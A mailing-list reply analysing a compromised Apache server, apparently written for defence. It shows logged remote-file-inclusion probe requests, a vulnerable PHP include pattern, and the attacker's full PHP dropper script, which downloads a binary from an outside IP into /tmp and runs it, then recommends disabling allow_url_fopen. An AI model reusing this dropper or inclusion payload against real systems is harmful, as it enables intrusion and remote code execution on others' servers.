Re: Re: apache / exe process taking 99 % cpu
I also googled after the ip address of that remote box to which the
alleged apache proc had a connection and found these links:
http://www.linux.org.ru/view-message.jsp?msgid=632105&back=view-group.jsp%3Fgroup%3D7300 <http://www.linux.org.ru/view-message.jsp?msgid=632105&back=view-group.jsp%3Fgroup%3D7300>
http://www.linux360.ro/forum/archive/o_t/t_4082/proces_care_papa_tot_procesorul_.html
Unfortunately, I don't speak russian or romanian either, but I think they
describe the same problems like I have. I seems to be a php issue. I
searched through all php files that "include" or "fopen" something ...
whew there are way too many.
I can read russian and examined given sources. Problem seems to be in
poorly written PHP scripts. After searching logs it seems, that there is
some kind of robot, which traverses sites an on every script with
parameters tries substitute every parameter with URL:
Standard invocation:
x.x.x.x - - [date] "GET /script.php?product_id=4265&pic=2 HTTP/1.1" 200
32011
Robot tries:
x.x.x.x - - [date] "GET
/script.php?product_id=http%3A//217.59.104.226/&pic=http%3A//217.59.104.226/
HTTP/1.0" 200 27948
It tries to exploit similar PHP code (on unvalidated vars from URL):
if(!empty($url_param))
{
include($url_param . '.inc');
}
else
{
include('default.inc');
}
When allowed by PHP configuration (allow_url_fopen = on), it downloads
this PHP script (reformated for better reading):
<?
passthru("killall -9 exe dsadas /tmp/dsadas");
@unlink("/tmp/dsadas");
$fd = fopen("/tmp/dsadas", "w");
if(!$fd) exit;
$xx = fopen('http://142.176.141.5/tmp', 'rb');
while($x=fread($xx, 10240))
fwrite($fd, $x);
fclose($xx);
fclose($fd);
chmod("/tmp/dsadas", 0700);
passthru("/tmp/dsadas;rm -f /tmp/dsadas");
?>
I tried to download file at 142.176.141.5/tmp ("exe" file itself), but
it says 404 not found. There are several IP adresses, so maybe someone
will have better luck.
Solution:
1) Disable allow_url_fopen, unless you really need it
2) Check scripts which need enabled allow_url_fopen.
Or you can touch /tmp/dsadas and make it not writable for apache user
(just kidding ;-)))
Petr Chyba
Reply to: